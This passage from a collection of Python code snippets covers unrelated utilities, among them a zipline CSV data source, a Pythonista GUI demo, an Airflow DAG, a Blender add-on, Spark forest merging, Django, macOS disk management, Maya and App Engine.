from zipline.gens.utils import hash_args
from zipline.sources.data_source import DataSource
import datetime
import csv
import numpy as np
def get_time(time_str):
time_array = map(int, time_str.split(":"))
assert len(time_array) == 2
assert time_array[0] < 24 and time_array[1] < 61
return datetime.time(time_array[0], time_array[1])
def gen_ts(date, time):
return pd.Timestamp(datetime.datetime.combine(date, time))
class DatasourceCSVohlc(DataSource):
""" expects dictReader for a csv file
with the following columns in the header
dt, symbol, open, high, low, close, volume
dt expected in ISO format and order does not matter"""
def __init__(self, data, **kwargs):
isinstance(data, csv.DictReader)
self.data = data
# Unpack config dictionary with default values.
if 'symbols' in kwargs:
self.sids = kwargs.get('symbols')
else:
self.sids = None
self.tz_in = kwargs.get('tz_in', "US/Eastern")
self.start = pd.Timestamp(np.datetime64(kwargs.get('start')))
self.start = self.start.tz_localize('utc')
self.end = pd.Timestamp(np.datetime64(kwargs.get('end')))
self.end = self.end.tz_localize('utc')
start_time_str = kwargs.get("start_time", "9:30")
end_time_str = kwargs.get("end_time", "16:00")
self.start_time = get_time(start_time_str)
self.end_time = get_time(end_time_str)
self._raw_data = None
self.arg_string = hash_args(data, **kwargs)
@property
def instance_hash(self):
return self.arg_string
def raw_data_gen(self):
previous_ts = None
for row in self.data:
dt64 = pd.Timestamp(np.datetime64(row["dt"]))
ts = pd.Timestamp(dt64).tz_localize(self.tz_in).tz_convert('utc')
if ts < self.start or ts > self.end:
continue
if previous_ts is None or ts.date() != previous_ts.date():
start_ts = gen_ts(ts.date(), self.start_time)
end_ts = gen_ts(ts.date(), self.end_time)
volumes = {}
price_volumes = {}
sid = row["symbol"]
if self.sids is None or sid in self.sids:
if sid not in volumes:
volumes[sid] = 0
price_volumes[sid] = 0
if ts < start_ts or ts > end_ts:
continue
event = {"sid": sid, "type": "TRADE", "symbol": sid}
cols = ["open", "high", "low", "close"]
event["dt"] = ts
event["price"] = float(row["close"])
event["volume"] = row["volume"]
volumes[sid] += float(event["volume"])
price_volumes[sid] += event["price"] * event["volume"]
event["vwap"] = price_volumes[sid] / volumes[sid]
for field in cols:
event[field] = row[field]
yield event
previous_ts = ts
@property
def raw_data(self):
if not self._raw_data:
self._raw_data = self.raw_data_gen()
return self._raw_data
@property
def mapping(self):
return {
'sid': (lambda x: x, 'sid'),
'dt': (lambda x: x, 'dt'),
'open': (float, 'open'),
'high': (float, 'high'),
'low': (float, 'low'),
'close': (float, 'close'),
'price': (float, 'price'),
'volume': (int, 'volume'),
'vwap': (lambda x: x, 'vwap')
}
class DataSourceCSVSignal(DataSource):
""" expects dictReader for a csv file in form with header
dt, symbol, signal_name
dt expected in ISO format"""
def __init__(self, data, **kwargs):
assert isinstance(data, csv.DictReader)
self.data = data
# Unpack config dictionary with default values.
if 'symbols' in kwargs:
self.sids = kwargs.get('symbols')
else:
self.sids = None
self.start = kwargs.get('start')
self.end = kwargs.get('end')
self.signal
# signals expects a list
self.arg_string = hash_args(data, **kwargs)
self._raw_data = None
@property
def instance_hash(self):
return self.arg_string
def raw_data_gen(self):
previous_ts = None
for row in self.data:
# here is the group_node referring to our root
dt64 = np.datetime64(row["dt"])
ts = pd.Timestamp(dt64).tz_localize(self.tz_in).tz_convert('utc')
if ts < self.start or ts > self.end:
continue
if previous_ts is None or ts.date() != previous_ts.date():
start_ts = gen_ts(ts.date(), self.start_time)
end_ts = gen_ts(ts.date(), self.end_time)
sid = row["symbol"]
if self.sids is None or sid in self.sids:
event = {"sid": sid, "type": "CUSTOM", "dt": ts,
"signal": row[self.signal_name]}
yield event
previous_ts = ts
@property
def raw_data(self):
if not self._raw_data:
self._raw_data = self.raw_data_gen()
return self._raw_data
@property
def mapping(self):
return {
'sid': (lambda x: x, 'symbol'),
'dt': (lambda x: x, 'dt'),
'signal': (lambda x: x, 'signal'),
}
```
#### File: hard-gists/5953776/snippet.py
```python
from Hydrogen import *
from HydrogenLayouts import HColumnLayout, HBarLayout, HWindowLayout
from time import localtime
#
# A Window base class to house the Demo Components
#
class DemoWindow(HContainer):
def __init__(self, title='Title'):
HContainer.__init__(self)
self.layout = HWindowLayout(self)
self.add_bars(title)
def add_bars(self, title):
titleBarInfos = (
(title, 'move', 'top'),
('Status Bar', 'resize', 'bottom'))
for titleBarInfo in titleBarInfos:
title_bar = HText(titleBarInfo[0])
title_bar.id = titleBarInfo[1]
title_bar.ignores_touches = False
title_bar.touch_listeners.append(self.touch_listener)
self.add_component(title_bar, titleBarInfo[2])
def touch_listener(self, comp, type, touch):
if type == 'began':
self.get_scene().to_front(self)
if type == 'moved':
if comp.id == 'move':
x_new = self.bounds.x + (touch.location.x - touch.prev_location.x)
y_new = self.bounds.y + (touch.location.y - touch.prev_location.y)
self.bounds = Rect(x_new, y_new, self.bounds.w, self.bounds.h)
elif comp.id == 'resize':
x_move = touch.location.x - touch.prev_location.x
y_move = touch.location.y - touch.prev_location.y
w = self.bounds.w + x_move
h = self.bounds.h - y_move
y = self.bounds.y + y_move
self.bounds = Rect(self.bounds.x, y, w, h)
self.do_layout()
# Example widget to display the current time
class HClock(HText):
def __init__(self):
HText.__init__(self,'00:00:00')
self.sec = -1
self.laf_prefix = 'Clock '
def draw_foreground(self, x, y):
t = localtime()
if t.tm_sec <> self.sec:
self.sec = t.tm_sec
self.set_text('{:02d}:{:02d}:{:02d}'.format(t.tm_hour, t.tm_min, t.tm_sec))
HText.draw_foreground(self, x, y)
# Progress bar set to update with the seconds of the clock
class DemoProgressBar(HProgressBar):
def draw_foreground(self, x, y):
t = localtime()
self.value = t.tm_sec / 59.0
HProgressBar.draw_foreground(self, x, y)
# Example widget to display the average FPS.
class HFramesPerSecond(HText):
def __init__(self):
HText.__init__(self, 'FPS = 00.0')
self.laf_prefix = 'FPS '
self.SAMPLE_FRAMES = 30
self.delta = 0
self.frame = 0
self.fps = 0.0
def draw_foreground(self, x, y):
self.update_fps()
HText.draw_foreground(self, x, y)
def update_fps(self):
hscene = self.get_scene()
if(hscene <> None):
self.delta += hscene.dt
self.frame += 1
if(self.frame == self.SAMPLE_FRAMES):
self.fps = self.SAMPLE_FRAMES / self.delta
self._text = 'FPS = {:.1f}'.format(self.fps)
self._img = None
self.frame = 0
self.delta = 0
# Instructions to fade out over time
class HDemoInstructions(HText):
def __init__(self):
HText.__init__(self, 'To get started, drag the left bar onto the screen.')
self.laf_prefix = 'Instructions '
self.alpha = 1.0
self.delay = 3.0
self.fade = 3.0
def set_alpha(self):
hscene = self.get_scene()
if(hscene <> None):
secs = hscene.t
if(secs > self.delay + self.fade):
self.alpha = 0.0
self.is_visible = False
elif(secs > self.delay):
self.alpha = (self.fade + self.delay - secs) / self.fade
else:
self.alpha = 1.0
def h_draw(self, x_offset, y_offset):
self.set_alpha()
r, g, b, a = self.laf['Background']
self.laf['Background'] = (r, g, b, self.alpha)
r, g, b, a = self.laf['Border']
self.laf['Border'] = (r, g, b, self.alpha)
r, g, b, a = self.laf['Foreground']
self.laf['Foreground'] = (r, g, b, self.alpha)
HText.h_draw(self, x_offset, y_offset)
class Demo(HScene):
def setup(self):
self.add_local_laf()
self.add_instructions()
self.text_demo = self.add_text_demo()
self.image_demo = self.add_image_demo()
self.slider_demo = self.add_slider_demo()
self.switch_demo = self.add_switch_demo()
self.progress_demo = self.add_progress_demo()
self.lookandfeel_demo = self.add_lookandfeel_demo()
self.clock = self.add_clock()
self.fps = self.add_fps()
self.side_bar = self.add_side_bar()
def add_local_laf(self):
LAF['Clock Font Size'] = 20
LAF['Clock Foreground'] = (0.50, 0.00, 0.00, 1.00)
LAF['Clock Show Background'] = False
LAF['Clock Show Border'] = False
LAF['FPS Font Size'] = 20
LAF['FPS Foreground'] = (0.00, 0.50, 0.00, 1.00)
LAF['FPS Show Background'] = False
LAF['FPS Show Border'] = False
LAF['Instructions Font Size'] = 30
LAF['Instructions Show Background'] = False
LAF['Instructions Show Border'] = False
LAF['Top Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Top Selection Bar Shape'] = round_top_rect
LAF['Bottom Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Bottom Selection Bar Shape'] = round_bottom_rect
LAF['Selection Bar Background'] = (1.00, 1.00, 1.00, 1.00)
LAF['Selection Bar Shape'] = rectangle
LAF['Spacer Show Background'] = False
LAF['Spacer Show Border'] = False
def add_instructions(self):
instructions = HDemoInstructions()
self.add_component(instructions)
instructions.bounds.x = (self.bounds.w - instructions.bounds.w) / 2
instructions.bounds.y = (self.bounds.h - instructions.bounds.h) / 2
def add_text_demo(self):
panel = HContainer()
panel.insets = HInset(10, 10, 5, 5)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0,0,-0.5,0)
panel.layout.fill_width = False
lines = '''Demonstration text components
Simple control that will write text label on screen
Choose any font available in Pythonista
And any font size or colour
Borders and Backgrounds can be configured
with the Look-And-Feel
Just like all of the other components'''
for line in lines.splitlines():
panel.add_component(HText(line.strip()))
window = DemoWindow('HText Components')
window.add_component(panel, 'center')
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_image_demo(self):
img_control = HImage()
img_control.set_image('Test_Mandrill', Size(265, 256))
img_control.stretch = True
window = DemoWindow('HImage Component')
window.add_component(img_control)
window.is_visible = False
self.add_component(window)
return window
def add_slider_demo(self):
panel = HContainer()
panel.insets = HInset(10, 10, 0, 10)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0, 0, 4, 0)
panel.add_component(HText('Sliders Adjust Background'))
r, g, b = self.laf['Background']
slider = HSlider()
slider.id = 'red'
slider.value = r
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
slider = HSlider()
slider.id = 'green'
slider.value = g
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
slider = HSlider()
slider.id = 'blue'
slider.value = b
slider.change_listeners.append(self.slider_moved)
panel.add_component(slider)
self.slider_text = HText()
self.slider_moved(slider)
panel.add_component(self.slider_text)
window = DemoWindow('HSlider Components')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_switch_demo(self):
clock = HClock()
clock.is_visible = False
self.add_component(clock)
clock.bounds.x = (self.bounds.w - clock.bounds.w) / 2
clock.bounds.y = self.bounds.h - (2 * clock.bounds.h)
fps = HFramesPerSecond()
fps.is_visible = False
self.add_component(fps)
fps.bounds.x = (self.bounds.w - fps.bounds.w) / 2
fps.bounds.y = fps.bounds.h
panel = HContainer()
panel.insets = HInset(10, 10, 0, 10)
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0,0,2,2)
panel.layout.fill_width = False
switch_clock = HSwitch()
switch_clock.id = clock
switch_clock.change_listeners.append(self.switch_flipped)
switch_fps = HSwitch()
switch_fps.id = fps
switch_fps.change_listeners.append(self.switch_flipped)
panel.add_component(HText('Use Switches to control On/Off functions'))
panel.add_component(HText('Activate Time Display'))
panel.add_component(switch_clock)
panel.add_component(HText('Activate Frame Rate Display'))
panel.add_component(switch_fps)
window = DemoWindow('HSwitch Components')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_progress_demo(self):
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.insets = HInset(10, 10, 0, 10)
panel.add_component(HText('Progress bar linked to clock seconds'))
panel.add_component(DemoProgressBar())
window = DemoWindow('HProgressBar Component')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def set_laf_demo_labels(self):
self.font_label.set_text(LAF["Font"])
self.font_size_label.set_text(str(LAF["Font Size"]))
self.font_colour_label.set_text(str(LAF["Text Foreground"]))
self.shape_label.set_text(LAF["Shape"].__name__)
self.radius_label.set_text(str(LAF["Edge Radius"]))
self.background_label.set_text(str(LAF["Background"]))
self.border_label.set_text(str(LAF["Border"]))
self.border_on_label.set_text(str(LAF["Show Border"]))
self.border_width_label.set_text(str(LAF["Border Width"]))
def set_laf_1(self):
LAF["Shape"] = round_rect
LAF["Text Foreground"] = (0.00, 0.00, 0.00, 1.00)
LAF["Button Foreground"] = (0.00, 0.00, 0.00, 1.00)
LAF["Background"] = (0.90, 0.90, 0.90, 1.00)
LAF["Button Background"] = (0.80, 0.80, 0.80, 1.00)
LAF["Button Selected"] = (0.60, 0.60, 0.60, 1.00)
LAF["Border"] = (0.50, 0.50, 0.50, 1.00)
LAF["Border Width"] = 1
LAF["Font"] = 'AppleSDGothicNeo-Medium'
LAF["Font Size"] = 16
LAF["Edge Radius"] = 6
LAF["Show Background"] = True
LAF["Show Border"] = True
def set_laf_2(self):
LAF["Shape"] = rectangle
LAF["Text Foreground"] = (0.25, 0.00, 0.25, 1.00)
LAF["Button Foreground"] = (0.25, 0.00, 0.25, 1.00)
LAF["Background"] = (0.30, 0.30, 0.50, 1.00)
LAF["Button Background"] = (0.50, 0.75, 1.00, 1.00)
LAF["Button Selected"] = (0.25, 0.40, 0.50, 1.00)
LAF["Border"] = (0.15, 0.15, 0.30, 1.00)
LAF["Border Width"] = 3
LAF["Font"] = 'Avenir-Heavy'
LAF["Font Size"] = 14
LAF["Edge Radius"] = 8
LAF["Show Background"] = True
LAF["Show Border"] = True
def set_laf_3(self):
LAF["Shape"] = round_right_rect
LAF["Text Foreground"] = (0.00, 0.25, 0.00, 1.00)
LAF["Text Foreground"] = (0.00, 0.25, 0.00, 1.00)
LAF["Background"] = (0.70, 0.90, 0.70, 1.00)
LAF["Button Background"] = (0.60, 0.80, 0.80, 1.00)
LAF["Button Selected"] = (0.40, 0.60, 0.60, 1.00)
LAF["Border"] = (0.50, 0.50, 0.50, 1.00)
LAF["Border Width"] = 0
LAF["Font"] = 'Futura-Medium'
LAF["Font Size"] = 18
LAF["Edge Radius"] = 8
LAF["Show Background"] = True
LAF["Show Border"] = False
def add_lookandfeel_demo(self):
buttonInfos = (
(self.set_laf_1, 'left'),
(self.set_laf_2, 'center'),
(self.set_laf_3, 'right'))
self.font_label = HText()
self.font_size_label = HText()
self.font_colour_label = HText()
self.shape_label = HText()
self.radius_label = HText()
self.background_label = HText()
self.border_label = HText()
self.border_on_label = HText()
self.border_width_label = HText()
barInfos = (
('Top ', 'Font Name', self.font_label),
('', 'Font Size', self.font_size_label),
('', 'Font Colour', self.font_colour_label),
('', 'Shape', self.shape_label),
('', 'Radius', self.radius_label),
('', 'Background', self.background_label),
('', 'Border', self.border_label),
('', 'Border On', self.border_on_label),
('Bottom ', 'Border Width', self.border_width_label))
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.layout.pad = HInset(0, 0, -0.5, -0.5)
panel.insets = HInset(10, 10, 10, 10)
panel.add_component(HText("A sample of the LookAndFeel properties"))
bar = HContainer()
bar.layout = HBarLayout(bar)
bar.layout.pad = HInset(5, 5, 0, 0)
bar.insets = HInset(5,5,10,10)
for i, buttonInfo in enumerate(buttonInfos):
button = HButton('Sample L&F {}'.format(i))
button.id = buttonInfo[0]
button.click_listeners.append(self.laf_button_clicked)
bar.add_component(button, buttonInfo[1])
panel.add_component(bar)
spacer = HComponent()
spacer.laf_prefix = "Spacer "
spacer.preferred_size = Size(10, 10)
panel.add_component(spacer)
for barInfo in barInfos:
bar = HContainer()
bar.laf_prefix = '{}Selection Bar '.format(barInfo[0])
bar.layout = HBarLayout(bar)
bar.add_component(HText(barInfo[1]), 'left')
bar.add_component(barInfo[2], 'right')
panel.add_component(bar)
self.set_laf_demo_labels()
window = DemoWindow('Look and Feel Demo')
window.add_component(panel)
window.is_visible = False
self.add_component(window)
panel.laf['Shape'] = rectangle
return window
def add_simple_window(self, inComponent, inTitle):
panel = HContainer()
panel.layout = HColumnLayout(panel)
panel.add_component(inComponent)
window = DemoWindow(inTitle)
window.add_component(panel)
window.is_visible = False
self.add_component(window)
return window
def add_clock(self):
return self.add_simple_window(HClock(), 'Clock')
def add_fps(self):
return self.add_simple_window(HFramesPerSecond(), 'Frames Per Second')
def add_side_bar(self):
buttonInfos = (
('Text Component Demo', self.text_demo),
('Image Component Demo', self.image_demo),
('Slider Component Demo', self.slider_demo),
('Switch Component Demo', self.switch_demo),
('Progress Bar Component Demo', self.progress_demo),
('Look and Feel Demo', self.lookandfeel_demo),
('Sample Clock Component', self.clock),
('Sample Frames Per Second Component', self.fps))
side_bar = HContainer()
side_bar.insets = HInset(20, 20, 20, 20)
side_bar.layout = HColumnLayout(side_bar)
side_bar.layout.pad = HInset(0, 0, 4, 0)
for buttonInfo in buttonInfos:
button = HButton(buttonInfo[0])
button.id = buttonInfo[1]
button.click_listeners.append(self.button_clicked)
side_bar.add_component(button)
self.add_component(side_bar)
side_bar.laf['Shape'] = round_right_rect
y = (self.bounds.h - side_bar.bounds.h) / 2
x = -side_bar.bounds.w + 20
side_bar.bounds.x = x
side_bar.bounds.y = y
side_bar.touch_listeners.append(self.drag_side_bar)
return side_bar
def drag_side_bar(self, comp, type, touch):
if type == 'began':
self.get_scene().to_front(comp)
if type == 'moved':
x_new = comp.bounds.x + (touch.location.x - touch.prev_location.x)
if x_new > 0:
x_new = 0
elif x_new < -comp.bounds.w + 20:
x_new = -comp.bounds.w + 20
comp.bounds.x = x_new
def button_clicked(self, button):
comp = button.id
comp.bounds.x = (self.bounds.w - comp.bounds.w) / 2
comp.bounds.y = (self.bounds.h - comp.bounds.h) / 2
comp.is_visible = not comp.is_visible
self.to_front(comp)
def laf_button_clicked(self, button):
button.id.__call__()
self.set_laf_demo_labels()
self.load_lookandfeel()
def slider_moved(self, slider):
r, g, b = self.laf['Background']
if(slider.id == 'red'):
r = slider.value
elif(slider.id == 'green'):
g = slider.value
elif(slider.id == 'blue'):
b = slider.value
self.laf['Background'] = (r, g, b)
self.slider_text.set_text('Colour ({:.2f}, {:.2f}, {:.2f})'.format(r, g, b))
def switch_flipped(self, switch):
switch.id.is_visible = switch.is_selected
def to_front(self, comp):
self.components.remove(comp)
self.components.append(comp)
run(Demo())
```
#### File: hard-gists/5b769cd2a86bb1270188ffa423941d5f/snippet.py
```python
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators.postgres_operator import PostgresOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.operators.sensors import SqlSensor
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable, DAG
from datetime import datetime, timedelta
default_args = {
'owner': '@tmarthal',
'start_date': datetime(2017, 2, 1),
'depends_on_past': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
##
## The DAG for the application audience job to run
##
dag = DAG('sensor_dag_creation_inoperator',
default_args=default_args,
schedule_interval = '*/5 * * * *' # every five minutes
)
dag.doc = """
Simple http call which triggers when a row shows up in a database
"""
def response_check(response):
"""
Dumps the http response and returns True when the http call status is 200/success
"""
print("checking the reponse from the app")
print(response.content)
return response.status_code == 200
def process_new_accounts(ds, **kwargs):
"""
The sensor has detected new ids to process, so we call the http operator for each
"""
select_sql = "SELECT id from audiences where created_at > '{ds}'".format(ds=ds)
print("running select sql {}".format(select_sql))
pg_hook = PostgresHook(postgres_conn_id='letterpress-app')
connection = pg_hook.get_conn()
cursor = connection.cursor()
cursor.execute(select_sql)
account_ids = cursor.fetchall()
for account_id in account_ids:
# Create a sub-dag with each new id
# the child dag name
export_account_task_name = 'task_process_account_%s' % account_id
print("starting task: {}".format(export_account_task_name))
export_account_dag = DAG(
dag_id=export_account_task_name,
default_args=default_args,
schedule_interval='*/5 * * * *' # '@once'
)
## This hits the account export url, _endpoint/account/export?id={ACCOUNT_ID}&token={AUTH_TOKEN}
account_export_endpoint_task = SimpleHttpOperator(
task_id='account_export_endpoint_task_%s' % (account_id),
http_conn_id='application',
method='GET',
endpoint='_endpoint/account/export',
data={"id": "{}".format(account_id), "token": Variable.get("APPLICATION_ACCESS_TOKEN")}, # http params
response_check=response_check, # will retry based on default_args if it fails
dag=export_account_dag)
print("Created account processing DAG {}".format(export_account_dag.dag_id))
# register the dynamically created DAG in the global namespace?
globals()[export_account_task_name] = export_account_dag
return account_ids
sensor = SqlSensor(
task_id='account_creation_check',
conn_id='account-database',
poke_interval=600, #do the select every 600 seconds, 5 minutes
sql="SELECT id from accounts where created_at > '{{ds}}' LIMIT 1",
dag=dag
)
process_new_accounts_task = PythonOperator(task_id='process_new_accounts',
provide_context=True,
python_callable=process_new_accounts,
dag=dag)
sensor >> process_new_accounts_task
```
#### File: hard-gists/5c973ec1b5ab2e387646/snippet.py
```python
import bpy
from bpy.app.handlers import persistent
bl_info = {
"name": "Playback Once",
"author": "<NAME>",
"version": (1, 0, 0),
"blender": (2, 67, 3),
"location": "",
"description": "Playback once.",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Animation"}
@persistent
def stopPlaybackAtEnd(scene):
if scene.frame_current >= scene.frame_end:
bpy.ops.screen.animation_cancel()
def register():
bpy.app.handlers.frame_change_pre.append(stopPlaybackAtEnd)
def unregister():
bpy.app.handlers.frame_change_pre.remove(stopPlaybackAtEnd)
if __name__ == "__main__":
register()
```
#### File: hard-gists/5dcd725d464858e9082f/snippet.py
```python
from pyspark import SparkConf, SparkContext
from sklearn.datasets import make_classification
from sklearn.ensemble import ExtraTreesClassifier
import pandas as pd
import numpy as np
conf = (SparkConf()
.setMaster("local[*]")
.setAppName("My app")
.set("spark.executor.memory", "1g"))
sc = SparkContext(conf = conf)
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=12000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
n_classes=2,
random_state=0,
shuffle=False)
# or read from a file (for instance)
#df = pd.read_csv('data.csv', sep=' ', header=None)
#X = df[[1,2,3,4,5,6,7,8,9,10]].as_matrix()
#y = df[[0]][0].tolist()
# Partition data
def dataPart(X, y, start, stop): return dict(X=X[start:stop, :], y=y[start:stop])
def train(data):
X = data['X']
y = data['y']
return ExtraTreesClassifier(n_estimators=100,random_state=0).fit(X,y)
# Merge 2 Models
from sklearn.base import copy
def merge(left,right):
new = copy.deepcopy(left)
new.estimators_ += right.estimators_
new.n_estimators = len(new.estimators_)
return new
data = [dataPart(X, y, 0, 4000), dataPart(X,y,4000,8000), dataPart(X,y,8000,12000)]
forest = sc.parallelize(data).map(train).reduce(merge)
importances = forest.feature_importances_
std = np.std([tree.feature_importances_ for tree in forest.estimators_],
axis=0)
indices = np.argsort(importances)[::-1]
# Print the feature ranking
print("Feature ranking:")
for f in range(10):
print("%d. feature %d (%f)" % (f + 1, indices[f], importances[indices[f]]))
```
#### File: hard-gists/5eaed8a5c299e5282d066a1fbc03152c/snippet.py
```python
from __future__ import unicode_literals
from django.db import models
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor # noqa
class RelationNotLoaded(Exception):
pass
class StrictForwardManyToOne(ForwardManyToOneDescriptor):
def __get__(self, instance, cls=None):
try:
return getattr(instance, self.cache_name)
except AttributeError:
raise RelationNotLoaded(
'Relation `{rel}` not loaded. Use `select_related` or '
'`fetch_{rel}`'.format(rel=self.field.name)
)
def explicit_get(self, instance, cls=None):
return super(StrictForwardManyToOne, self).__get__(instance, cls)
class StrictForeignKey(models.ForeignKey):
def contribute_to_class(self, cls, name, **kwargs):
super(StrictForeignKey, self).contribute_to_class(cls, name, **kwargs)
# Override the descriptor defined by ForeignObject
descriptor = StrictForwardManyToOne(self)
setattr(cls, self.name, descriptor)
# Add a method so you don't always have to use select_related
fetch_name = 'fetch_{rel}'.format(rel=self.name)
setattr(cls, fetch_name, lambda inst: descriptor.explicit_get(inst))
# Create your models here.
class Author(models.Model):
name = models.TextField()
class Book(models.Model):
title = models.TextField()
author = StrictForeignKey(Author, on_delete=models.PROTECT, related_name='books')
```
#### File: hard-gists/5f1baad30024a898e9f2115ac9b0c631/snippet.py
```python
import objc
from Foundation import NSBundle
# Predefine some opaque types
DASessionRef = objc.createOpaquePointerType('DASessionRef', '^{__DASession=}', None)
DADiskRef = objc.createOpaquePointerType('DADiskRef', '^{__DADisk=}', None)
# Load DiskManagement framework classes
DiskManagment = objc.loadBundle('DiskManagment', globals(), bundle_path='/System/Library/PrivateFrameworks/DiskManagement.framework')
# Load DiskArbitration framework functions
DiskArbitration_bundle = NSBundle.bundleWithIdentifier_('com.apple.DiskArbitration')
functions = [
('DASessionCreate', '@o@'),
('DADiskGetBSDName', '*^{__DADisk=}'),
]
objc.loadBundleFunctions(DiskArbitration_bundle, globals(), functions)
class diskRef(object):
def __init__(self, dObj, controller, rawRef=False):
if rawRef:
self.cf_type = objc.objc_object(c_void_p=dObj.__pointer__)
self.ref_type = dObj
else:
self.cf_type = dObj
self.ref_type = DADiskRef(c_void_p=(dObj.__c_void_p__().value))
self.controller = controller
def __repr__(self):
return self.cf_type.__repr__()
@property
def devname(self):
return self.controller.shared.deviceNodeForDisk_error_(self.ref_type, None)
@property
def volname(self):
return self.controller.shared.volumeNameForDisk_error_(self.ref_type, None)
@property
def type(self):
return self.controller.shared.ioContentOfDisk_error_(self.ref_type, None)
@property
def facts(self):
possible = [x for x in dir(self.controller.shared) if (x.startswith('is') and x.endswith('_error_'))]
return [y for y in sorted([x.split('is',1)[-1].rsplit('_error_',1)[0] for x in possible]) if not '_' in y]
@property
def physical_store(self):
# This APFS and other disk types as well supposedly, looking at the code - like CoreStorage, SoftRAID ....
try:
results = self.controller.shared.physicalDisksForDisk_storageSystemName_error_(self.ref_type, None, None)
if results[0] is not None:
return diskRef(results[0], self.controller)
except:
pass
return None
def Is(self, factname):
if factname not in self.facts:
raise Exception('no such fact, check disk.facts')
selector = getattr(self.controller.shared, 'is' + factname + '_error_', None)
if selector is None:
raise Exception('no such fact, check disk.facts')
return (selector)(self.ref_type,None)
class diskList(object):
# This is dict-list hybrid that allows for slicing as well as lookups by dev name
def __init__(self, disks):
self._disk_list = disks[:]
self._disk_dict = dict()
for i,d in enumerate(disks):
self._disk_dict[d.devname] = d
def __iter__(self):
return iter(self._disk_list)
def __getitem__(self, index):
if isinstance(index, slice):
return self._disk_list.__getitem__(index)
elif isinstance(index, int):
return self._disk_list.__getitem__(index)
elif isinstance(index, diskRef):
# someone passed in a disk, so .. give them back the disk?
return index
return self._disk_dict[index]
def __repr__(self):
return self._disk_list.__repr__()
class diskManager(object):
def setup_managers(self):
# Create a DiskArb session
session = DASessionCreate(None)
# Get the shared disk manager
self.shared = DMManager.sharedManager()
session_p = DASessionRef(c_void_p=(session.__c_void_p__().value))
# connect the DA session
self.shared.setDefaultDASession_(session_p)
self.shared.setLanguage_('English')
# init the CS manager
self.shared_cs = DMCoreStorage.alloc().initWithManager_(self.shared)
def __init__(self):
self.shared = None
self.shared_cs = None
self.setup_managers()
def _formatted_disks(self, disk_list):
all_disks = sorted([diskRef(d, self) for d in disk_list], key=lambda x: x.devname)
return diskList(all_disks)
@property
def topLevelDisks(self):
return self._formatted_disks(self.shared.topLevelDisks())
@property
def disks(self):
return self._formatted_disks(self.shared.disks())
def diskForPath(self, path):
return diskRef(self.shared.diskForPath_error_(path, None), self, rawRef=True)
# Example usage
#
# from diskman import diskManager
# dm = diskManager()
#
# >>> dm.disks
# [<DADisk 0x7fd748434520 [0x7fff7c0b1440]>{id = /dev/disk0}, <DADisk 0x7fd748434550 [0x7fff7c0b1440]>{id = /dev/disk0s1}, ...
#
# >>> dm.diskForPath('/')
# <DADisk 0x7fa041c1a180 [0x7fff7c0b1440]>{id = /dev/disk1}
#
# >>> dm.diskForPath('/').volname
# u'Macintosh HD'
#
# >>> dm.diskForPath('/').devname
# u'/dev/disk1'
#
# >>> dm.disks['/dev/disk1'].facts
# ['AppleDiskImage', 'AppleRAIDDisk', 'AppleRAIDMemberDisk', 'AppleRAIDSetDisk', 'AppleRAIDSpareDisk', 'AppleRAIDUUID', ...
#
# >>> dm.disks['/dev/disk1'].Is('EjectableDisk')
# 0
#
# >>> dm.disks['/dev/disk1'].Is('InternalDisk')
# 1
```
#### File: hard-gists/5f59050155c3159c2185/snippet.py
```python
def checkMayaGuiBatchMode():
"""
Maya tip on detecting Maya Batch mode is from <NAME>'s blog post "MEL Sillyness":
http://www.scarpa.name/2010/12/16/mel-sillyness/
"""
# Check if Maya is running in batch mode or with a GUI
import maya.OpenMaya
isMayaInBatchMode = maya.OpenMaya.MGlobal.mayaState() == maya.OpenMaya.MGlobal.kBatch
return isMayaInBatchMode;
# Check if Maya is running in Batch mode or with a GUI
# 1 means Batch Mode, 0 means GUI mode
isMayaInBatchMode = checkMayaGuiBatchMode()
```
#### File: hard-gists/600fa8852b4741fb2bb1/snippet.py
```python
import logging
from google.appengine.api import memcache
from google.appengine.ext import ndb
from google.appengine.ext.ndb.google_imports import entity_pb
from google.appengine.ext.ndb.google_imports import ProtocolBuffer
from google.appengine.ext.ndb import model
def get_multi(keys):
""" A drop-in replacement of ndb.get_multi.
This version is much faster when fetching many small objects which are mostly in memcache.
The two functional differences from ndb are:
--all keys must belong to the same namespace
--Doesn't interact with ndb autobatcher.
Speedup depends on the memcache hit rate:
100%: 3x faster.
80%: 1.7x faster.
50%: about parity.
<10%: about 20% slower.
The code is closely based on ndb's own code, but avoids a lot of overhead (seemingly in their task queue code).
@param keys: list of Keys
@type keys: ndb.Key
@return: list of entities
@rtype: list
"""
if not keys:
return
ctx = ndb.get_context()
ns = keys[0].namespace()
# Check single namespace assumption.
for k in keys:
if k.namespace() != ns:
raise ValueError("All keys must belong to a single namespace.")
# First check the context cache.
results_from_context_cache = _get_from_context_cache(keys)
keys_from_context_cache = set([entity.key for entity in results_from_context_cache])
# Manually get from memcache anything not in context cache.
mkey_to_key = {key.urlsafe() : key for key in keys if key not in keys_from_context_cache}
# Strangely memcache.get_multi isn't instant even when key set is empty, so check explicitly.
if mkey_to_key:
memcache_response = memcache.get_multi(keys=mkey_to_key.keys(), key_prefix=ctx._memcache_prefix, namespace=ns)
else:
memcache_response = {}
